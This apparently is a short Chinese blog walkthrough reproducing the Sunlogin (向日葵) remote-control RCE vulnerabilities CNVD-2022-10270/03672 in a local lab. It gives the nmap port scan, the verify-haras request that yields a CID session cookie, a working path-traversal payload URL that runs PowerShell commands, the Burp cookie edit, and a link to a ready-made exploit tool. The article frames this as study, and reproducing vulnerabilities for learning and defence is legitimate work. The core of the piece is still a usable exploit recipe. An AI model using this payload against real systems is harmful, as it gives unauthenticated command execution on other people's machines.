向日葵RCE复现（CNVD-2022-10270/CNVD-20

向日葵是生活工作中最常用的一款远程办公工具之一。也是目前国内市面上用的最多的一款工具。本文来谈谈关于其CNVD-2022-10270/CNVD-2022-03672漏洞的利用和复现。 实验环境向日葵 <= 11.0.0.33 Kali Linux 我们首先在本地环境安装11.0.0.33的低版本向日葵。安装完成后，并用nmap对靶场进行端口扫描。 nmap -p 45000-55000 192.168.50.105 如下图，我们可以看到目标存在61376 61387这几个端口。 当然，为了方便我们可以利用python脚本快速检测，支持整个网段扫描。 通过上述方法，我们确定了目标的端口。现在我们便可以利用payload工具进行测试。 payload http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami 在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras （端口号：每一个都尝试，直到获取到session值CID） 访问paylaod，并在burp中进行抓包。 修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344Zl为Cookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl 效果如下： 同样，我们只需修改后面的whoami为其他的命令如ipconfig即可。 相关软件链接:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new 当然，这个是指定版本，主要是学习精神[吐舌][吐舌][吐舌][吐舌][吐舌]，做漏洞复现！希望大家在学习道路上，更上一层楼！